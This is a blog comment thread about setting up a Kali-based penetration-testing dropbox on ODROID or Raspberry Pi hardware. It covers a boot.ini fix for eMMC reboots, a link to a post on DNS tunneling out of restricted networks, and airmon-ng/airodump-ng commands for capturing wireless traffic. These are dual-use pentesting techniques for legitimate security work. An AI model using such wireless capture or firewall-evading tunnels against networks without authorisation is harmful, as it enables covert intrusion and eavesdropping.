Did you happen to miss a step or some info on the formatting piece? I got the 32GB EMMC card, it fails on reboot with Kali. Other distros work fine. Others are reporting the same issue, flash the image, boot once, fail on reboot, even after following the directions you provided. I’m using a 16GB sdcard and it’s fine. My 32GB sdcard was fine too so I think something is up with the EMMC and not the partition sizes.
Beau
October 4, 2016 @ 11:11 am
That’s the issue that steps 3-6 (starting at “Fix eMMC reboot Issue”) are supposed to fix. So, you are saying you followed those steps, and it is still failing to reboot?
Stephen
October 6, 2016 @ 9:34 am
Yes, just tried it again now to be 100% sure. Another post was saying you can’t use the whole partition, you have to leave some space at the end open. I tried that too with your instructions and no matter what I can’t get it to boot.
brkr19
October 24, 2016 @ 4:12 pm
Stephen, I was at the same point and saw Issue #76 on the repository related to this (https://github.com/offensive-security/kali-arm-build-scripts/issues/76). Following the instructions about changing boot.ini worked for me. I just remounted the eMMC on another computer, commented the second-to-last line, and uncommented the last line. My last three lines now look like this and it boots fine now:
# If using an initramfs, uncomment this and comment out bottom.
#booti ${loadaddr} ${initrd_loadaddr} ${dtb_loadaddr}
booti ${loadaddr} - ${dtb_loadaddr}
Steve Campbell
February 4, 2017 @ 8:03 pm
Very informative article and I really liked the detailed step-by-step guide and hardware comparison. I’ve been working on making dropboxes for highly secure networks recently where SSH isn’t allowed out. Internet access requires authenticating to a proxy and SSH isn’t allowed unless there’s a firewall exception for your IP address. The solution that I came up with that works for me is DNS tunneling. Please check out my blog post about this and tell me what you think. https://www.stevencampbell.info/2017/02/configure-pentest-dropbox-dns-tunneling/
Nate
March 26, 2017 @ 11:57 pm
I’m fairly new to infosec, and I am really just dipping my toes in at the moment. I’ve been in IT for almost 8 years now, but more on the network/systems admin side of things. I was following along for setting this up on a Raspberry Pi 3 Model B. My question is: since the R-Pi 3 Model B has the built-in wireless NIC, and I also have one of the wireless NICs you mentioned connected as well, wouldn’t I need to change all the “wlan0” interface references in the instructions to “wlan1”? I’m a little bit confused. Looking forward to reading more!
Beau
March 29, 2017 @ 5:38 am
Hey Nate,
What I would recommend doing is to use the built-in wlan0 as your AP interface for connecting to the device and use the extra interface for performing wireless attacks. So, you can go through the entire setup guide as is, but then if you plan on doing any wireless attacks use wlan1. After you are connected to the device you could run something like the following to listen on the wlan1 interface with Airodump-ng.
airmon-ng check kill
airmon-ng start wlan1
airodump-ng wlan1mon
Max Demajo
August 7, 2017 @ 12:24 pm
So in all you have three network interfaces, correct? The wired interface, through which you connect using SSH, the separate wireless interface, which you use for wireless attacks, and the built-in one (in the case of the Raspberry Pi) for management. What exactly is the management? Wouldn’t this be the SSH connection?
I also see you set up the box as an access point, is this required to make the SSH connections to and from the box? Or is it simply there to function as a Rogue AP for further pentesting?
Great article, wish I had read it sooner as I have just bought a Raspberry Pi, being unaware of the existence of the ODROID 🙁